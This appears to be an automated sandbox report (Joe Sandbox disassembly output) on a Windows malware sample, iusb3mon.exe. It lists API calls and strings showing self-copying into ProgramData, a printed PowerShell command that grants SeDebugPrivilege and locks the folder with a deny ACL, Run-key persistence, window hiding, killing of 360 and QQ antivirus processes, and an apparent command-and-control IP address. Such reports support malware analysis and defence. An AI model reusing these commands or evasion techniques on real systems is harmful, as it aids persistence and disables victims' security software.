C:\ProgramData\Program\iusb3mon.exe, xrefs: 06CF5E36, 06CF616E, 06CF61B6, 06CF61BF, 06CF6207, 06CF6210, 06CF6258, 06CF6261

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: OpenSleep$CloseFile$FindWindow$ModuleNameValue$CreateExecH_prologHandleMessageProcess32$FirstNextPostSendSnapshotToolhelp32Write
String ID: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml$C:\ProgramData\Program\iusb3mon.exe$Microsoft$Q360SafeMonClass$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$qqpctray.exe
API String ID: 3575359619-3011562891
Opcode ID: 15b79861048af7484485f352aee2b707cb75394437ae7a23a42191b001bc2281
Instruction ID: 935c75c8cfed7748da9ae4f9195be422d2d459380339ce2b28463b2e044395d9
Opcode Fuzzy Hash: 15b79861048af7484485f352aee2b707cb75394437ae7a23a42191b001bc2281
Instruction Fuzzy Hash: DBA1A171258305BFF2D8AB61BC45E7A7B9EEF40B04F00081DF755A92C1CBA5C8499A72

Function 06CF6587 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 163
filesleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF65AB
CreateDirectoryA.KERNEL32(?,00000000), ref: 06CF6600
SetFileAttributesA.KERNEL32(?,00000002,0000000A), ref: 06CF663D
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06CF6668

Part of subcall function 06CF7B7D: __EH_prolog.LIBCMT ref: 06CF7B82

Part of subcall function 06CF7109: __EH_prolog.LIBCMT ref: 06CF710E

GetFileAttributesA.KERNEL32(C:\ProgramData\Program\iusb3mon.exe), ref: 06CF6673
CopyFileA.KERNEL32(?,?,00000000), ref: 06CF6690
CopyFileA.KERNEL32(C:\ProgramData\iusb3mon.dat,C:\ProgramData\Program\iusb3mon.dat,00000001), ref: 06CF66C6
CopyFileA.KERNEL32(C:\ProgramData\templateWatch.dat,C:\ProgramData\Program\templateWatch.dat,00000001), ref: 06CF66D5
Sleep.KERNEL32(000000C8), ref: 06CF66DC
WinExec.KERNEL32(cmd /c echo.>c:\inst.ini,00000000), ref: 06CF6739
Sleep.KERNEL32(000000C8), ref: 06CF6744

Strings

: Not Exist, xrefs: 06CF660E
iusb3mon.exe, xrefs: 06CF65D9
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06CF6663
360tray.exe, xrefs: 06CF6712
c:\inst.ini, xrefs: 06CF6722
360Tray.exe, xrefs: 06CF6703
C:\ProgramData\Program\, xrefs: 06CF65B8
C:\ProgramData\Program\iusb3mon.exe, xrefs: 06CF666E, 06CF66E4
cmd /c echo.>c:\inst.ini, xrefs: 06CF6734
C:\ProgramData\Program\templateWatch.dat, xrefs: 06CF66C8, 06CF66CF, 06CF66F8
C:\ProgramData\Program, xrefs: 06CF65E7
C:\ProgramData\iusb3mon.dat, xrefs: 06CF66C1
C:\ProgramData\templateWatch.dat, xrefs: 06CF66D0
C:\ProgramData\Program\iusb3mon.dat, xrefs: 06CF66B9, 06CF66C0, 06CF66F0
Create Successed!, xrefs: 06CF6643

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Copy$AttributesExecH_prologSleep$CreateDirectoryModuleName
String ID: : Not Exist$360Tray.exe$360tray.exe$C:\ProgramData\Program$C:\ProgramData\Program\$C:\ProgramData\Program\iusb3mon.dat$C:\ProgramData\Program\iusb3mon.exe$C:\ProgramData\Program\templateWatch.dat$C:\ProgramData\iusb3mon.dat$C:\ProgramData\templateWatch.dat$Create Successed!$c:\inst.ini$cmd /c echo.>c:\inst.ini$iusb3mon.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')
API String ID: 1478482640-228079196
Opcode ID: 4d10ea6f3d2b3b03053ef9fca74460cd46c3b5b390895ebaf5f5750dad6c1379
Instruction ID: 4753addcd3e2afdbb191c12e7555c6a0a965c2cb779d7332e908ab53d56dfad7
Opcode Fuzzy Hash: 4d10ea6f3d2b3b03053ef9fca74460cd46c3b5b390895ebaf5f5750dad6c1379
Instruction Fuzzy Hash: 2541C03235434176E5E4B7B17C4AFAF335ADF85B20F10091AF3259A2C0DFE4D6499662

Function 06CF650A Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 55
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(00000000,06D1DD60), ref: 06CF6521
ShowWindow.USER32(00000000,00000000), ref: 06CF6525
FindWindowA.USER32(00000000,06D1DD54), ref: 06CF652D
ShowWindow.USER32(00000000,00000000), ref: 06CF6531
FindWindowA.USER32(00000000,06D1DD44), ref: 06CF6539
ShowWindow.USER32(00000000,00000000), ref: 06CF653D
FindWindowA.USER32(00000000,06D1DD38), ref: 06CF6545
ShowWindow.USER32(00000000,00000000), ref: 06CF6549
FindWindowA.USER32(00000000,---------==============), ref: 06CF6551
ShowWindow.USER32(00000000,00000000), ref: 06CF6555
FindWindowA.USER32(00000000,===========-----------), ref: 06CF655D
ShowWindow.USER32(00000000,00000000), ref: 06CF6561
FindWindowA.USER32(00000000,06D1DCF8), ref: 06CF6569
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06CF6574
Sleep.KERNEL32(000000C8), ref: 06CF657F

Strings

===========-----------, xrefs: 06CF6557
---------==============, xrefs: 06CF654B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Find$Show$MessageSendSleep
String ID: ---------==============$===========-----------
API String ID: 155205692-1512992862
Opcode ID: 18ff6a8bc04d6291c36b979aaa6be02a01034de77f848aa320027d96e784954e
Instruction ID: 856dc7d9b3b1b7fdefb754cdb294aaf716d69f670ef742fa1f587e883966f090
Opcode Fuzzy Hash: 18ff6a8bc04d6291c36b979aaa6be02a01034de77f848aa320027d96e784954e
Instruction Fuzzy Hash: 3CF0D0E0E8036C39F5A037B35CCDE2F5E5EDED86997011C11B205A61028AF8DC08CDB0

Function 06CF571E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46
synchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,143.92.60.116,06D1CC34,06CF6CAB), ref: 06CF5729
GetLastError.KERNEL32 ref: 06CF5731
CloseHandle.KERNEL32(00000000), ref: 06CF573F
Sleep.KERNEL32(000003E8), ref: 06CF5761
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 06CF577F
CloseHandle.KERNEL32(00000000), ref: 06CF5786

Strings

LJPXYXC, xrefs: 06CF5722
143.92.60.116, xrefs: 06CF571F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
String ID: 143.92.60.116$LJPXYXC
API String ID: 3934243189-555951940
Opcode ID: b8a909128ab2643b5f82274b77f776a8fd09d11f94774ccd2adcb472d4521272
Instruction ID: 071d059d222ed5bb73d20f7c351bd0278de9e6f20af27ec839afb4470681c63d
Opcode Fuzzy Hash: b8a909128ab2643b5f82274b77f776a8fd09d11f94774ccd2adcb472d4521272
Instruction Fuzzy Hash: CEF06732923532BAE2F52B37AC0DDCB3E2EDF676B1B510A11F70DA02809A184501C2F2

Function 06CF6780 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 26
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 06CF678E
SetThreadExecutionState.KERNEL32(80000003), ref: 06CF6791
SetThreadExecutionState.KERNEL32(80000001), ref: 06CF679C
Sleep.KERNEL32(000003E8), ref: 06CF67AE
OutputDebugStringA.KERNEL32(Thread running...), ref: 06CF67B9
OutputDebugStringA.KERNEL32(Thread Exit...), ref: 06CF67C3

Strings

Thread Exit..., xrefs: 06CF67BE
Thread running..., xrefs: 06CF67B4

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecutionStateThread$DebugOutputString$Sleep
String ID: Thread Exit...$Thread running...
API String ID: 3332416543-10974087
Opcode ID: 7b12b734a5368874ef061015d679ce9ddd2a8b203c1591c92a6d0d65076b6267
Instruction ID: ea8cae336f7aea32d082b8695797f08f632ee9d9754aa651630b3c1cc218f214
Opcode Fuzzy Hash: 7b12b734a5368874ef061015d679ce9ddd2a8b203c1591c92a6d0d65076b6267
Instruction Fuzzy Hash: 33E08622E602367AF7A163B66C40E6A6A9E9F95760B15042BEB04E3204969059154AF2

Function 06CF5DA7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06CF5DE5
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06CF5DF0
FindWindowA.USER32(?,00000000), ref: 06CF5DB1

Part of subcall function 06CF7B7D: __EH_prolog.LIBCMT ref: 06CF7B82

Part of subcall function 06CF7109: __EH_prolog.LIBCMT ref: 06CF710E

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 06CF5DA8

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prologMessage$FindPostSendWindow
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1670880786-3106534563
Opcode ID: 9b1fd64f5319b7a9a8d4e82836269b0f0ee6b5008a4f2cd821931c5d131e0dac
Instruction ID: b4fdf8914c3a9adb6459f3ebbbe6d35b6bf8e174d69ff52150846177393c1ef8
Opcode Fuzzy Hash: 9b1fd64f5319b7a9a8d4e82836269b0f0ee6b5008a4f2cd821931c5d131e0dac
Instruction Fuzzy Hash: BEF096723402293FF5D527A07C99F3E1659CBC5F96F10042DF3215A2C0CE994C4966B6

Function 06CF8D1A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06CF8D33

Part of subcall function 06CFB39D: CreateThread.KERNEL32(?,06CF8D56,06CFB408,00000000,00000000,?), ref: 06CFB3DE
Part of subcall function 06CFB39D: GetLastError.KERNEL32(?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06CFB3E8

WaitForSingleObject.KERNEL32(?,000000FF), ref: 06CF8D60
CloseHandle.KERNEL32(?), ref: 06CF8D69

Strings

G&, xrefs: 06CF8D51

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: G&
API String ID: 3117531959-2298792099
Opcode ID: e8e5709438006567dc3fc0dc4c1bdc0cceb4da505427f74316233c46caa35c7a
Instruction ID: 62a544589e2688015466c54075a787aac4247bfb9c0ba9b647ae5ccda5c975fc
Opcode Fuzzy Hash: e8e5709438006567dc3fc0dc4c1bdc0cceb4da505427f74316233c46caa35c7a
Instruction Fuzzy Hash: F7F0BDB290111ABFDF41AFA8DD05CEE7BBAFB04310F104565FE21E2250E7319E249B90

Function 06CF7AC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06D28518,06CF6098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06CF7ADA
WriteFile.KERNEL32(00000000,06D18760,00000EE2,?,00000000), ref: 06CF7AF2
CloseHandle.KERNEL32(00000000), ref: 06CF7AFF

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 06CF7ACA

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1065093856-3106534563
Opcode ID: 629f13cae3a4918f64929cc5b7b604ebc9847175e3f247b01718a7848e9f93a9
Instruction ID: ac16ab84eab4ec0d166c37a4b684e2bcdd44b23bc690f34a0ceb83b3e12fe2c6
Opcode Fuzzy Hash: 629f13cae3a4918f64929cc5b7b604ebc9847175e3f247b01718a7848e9f93a9
Instruction Fuzzy Hash: ACE0DF7128222C7FFA201E70ECCAFEB7B1EEB017D8F004121FB04A9240C6919D0486B0

Function 06D0CD41 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,?,?,06D0CD3C), ref: 06D0CDB8
GetProcessVersion.KERNEL32(00000000,?,?,?,06D0CD3C), ref: 06D0CDF5
LoadCursorA.USER32(00000000,00007F02), ref: 06D0CE23
LoadCursorA.USER32(00000000,00007F00), ref: 06D0CE2E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 0370c939e6be3d468cdc7f6357737257ac2ad3a892e7de1b1a7d362a89e76ac2
Instruction ID: f1cc5fb424bd2e64d70a05632f38993b9b432796beb05349e3152fd280c96ae3
Opcode Fuzzy Hash: 0370c939e6be3d468cdc7f6357737257ac2ad3a892e7de1b1a7d362a89e76ac2
Instruction Fuzzy Hash: 6A118FB1A407108FE768DF3A889462ABBE5FB487047404D3FE187C6B80D774E404CB90

Function 00C05B68 Relevance: 6.1, APIs: 4, Instructions: 53
timethreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00C0121E

Part of subcall function 00C06F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C011FC,?,?,?,?,00C011FC,?,00C2A814), ref: 00C06F94

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C06571
GetCurrentThreadId.KERNEL32 ref: 00C06580
GetCurrentProcessId.KERNEL32 ref: 00C06589
QueryPerformanceCounter.KERNEL32(?), ref: 00C06596

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: CurrentTime$CounterExceptionFilePerformanceProcessQueryRaiseSystemThread___std_exception_copy
String ID:
API String ID: 3658488982-0
Opcode ID: 7924c398e60258c1ef710139d1c2b5cb22be2a18a10c97fe9b32efeef1090fa3
Instruction ID: 644e910c734ee23f427358117fa30b8612ee83dd99657bf97fe84916d5db8cdd
Opcode Fuzzy Hash: 7924c398e60258c1ef710139d1c2b5cb22be2a18a10c97fe9b32efeef1090fa3
Instruction Fuzzy Hash: D6110630C0020DEBCF04EBB4D849B9EB7B8BF08311F5085A5E815E7090EB70AB45EB91

Function 06CF1F38 Relevance: 4.5, APIs: 3, Instructions: 39
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,06CF62A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06CF1F56
RegQueryValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,?,?,06CF62A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06CF1F72
RegCloseKey.ADVAPI32(?,?,?,?,?,06CF62A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06CF1F7D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: f167c14fc5c047456cb9918e91084fe38e0ecaca384c5e62fdac51778f4252fe
Instruction ID: 560bee7e164b55a13705e7790f77f93e9c5387f4cf2f710b95bdd2bdbe729383
Opcode Fuzzy Hash: f167c14fc5c047456cb9918e91084fe38e0ecaca384c5e62fdac51778f4252fe
Instruction Fuzzy Hash: CCF090B2904208FFEF915F91DC84EEE7B6EEB04364F088825FE1596110C7328E04EB60

Function 06CF7B7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF7B82

Strings

C:\ProgramData\Program, xrefs: 06CF7B8B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: C:\ProgramData\Program
API String ID: 3519838083-2177086111
Opcode ID: f2f3588b227fe857ef9a09840f8d84827c8b210dadb60bacbaee94170e94df30
Instruction ID: f9f09820ebf32cc12953afb6a69c312cd7e8f4f51c123578c6b0e588eaadefa4
Opcode Fuzzy Hash: f2f3588b227fe857ef9a09840f8d84827c8b210dadb60bacbaee94170e94df30
Instruction Fuzzy Hash: 90414C30A202058FDB94DF9DD984AADBBF0EF49324F2485A9E65597351C731DE40CBA1

Function 04EC01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04EC022B

Memory Dump Source

Source File: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_4ec0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: f5a81d54f313f5dfd22d85463327a6adca244803293149667a453e74a01bb786
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: A6A15B71A00606EFDB14CFA9CA80AAEB7B5FF48318F14916DE515DB351E730EA52CB90

Function 06CFB39D Relevance: 3.0, APIs: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

Part of subcall function 06D0005D: HeapAlloc.KERNEL32(00000008,06CF8D56,00000000,00000000,00000000,00000000,00000000,?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06D00153

CreateThread.KERNEL32(?,06CF8D56,06CFB408,00000000,00000000,?), ref: 06CFB3DE
GetLastError.KERNEL32(?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06CFB3E8

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
